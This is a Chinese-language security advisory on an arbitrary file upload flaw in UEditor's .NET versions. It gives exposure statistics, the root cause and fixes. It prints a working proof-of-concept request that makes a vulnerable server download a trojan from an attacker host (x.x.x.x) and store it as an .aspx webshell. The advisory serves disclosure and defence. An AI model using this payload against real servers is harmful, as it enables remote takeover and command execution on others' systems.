【漏洞预警】UEidtor编辑器任意文件上传可getshell

UEditor是由百度开发的开源富文本编辑器，开源基于BSD协议，小巧灵活，使用简单，有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中，并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件，执行命令控制服务器。

UEditor下载地址:http://ueditor.baidu.com/website/download.html

分布情况

据不完全统计，下面是全球部分用户使用情况，中国最多，有5000+，美国次之，1000+，其他国家用户比较少：

下面是全国部分用户使用情况，浙江842（阿里云？），河南345，北京334，四川206：

根据FOFA指纹识别功能，发现有很多重点机构在使用.NET版本的UEditor，包括某些国内甚至世界知名高校。这里为了避免黑客利用进行攻击，不说出具体名字。如果不确定使用的UEditor是否存在漏洞。

漏洞分析

该漏洞是由于上传文件时，使用的CrawlerHandler类未对文件类型进行检验，导致了任意文件上传。1.4.3.3和1.5.0版本利用方式稍有不同，1.4.3.3需要一个能正确解析的域名。而1.5.0用IP和普通域名都可以。

漏洞利用

这里针对1.5.0版本进行测试，需要先在外网服务器上传一个图片木马，比如:1.jpg/1.gif/1.png都可以，下面x.x.x.x是外网服务器地址，source[]参数值改为图片木马地址，并在结尾加上“?.aspx”即可getshell，利用POC：

POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

POC这里路径需要根据实际情况改变。在官网下载1.5.0受漏洞影响版本并复现：

复现成功会返回路径信息，可以看到木马已经成功被传上去了。

防御措施

1.修改CrawlerHandler.cs 增加对文件类型的检测；

2.部署waf等相关安全产品。

更多安全文章可以关注链接：https://nosec.org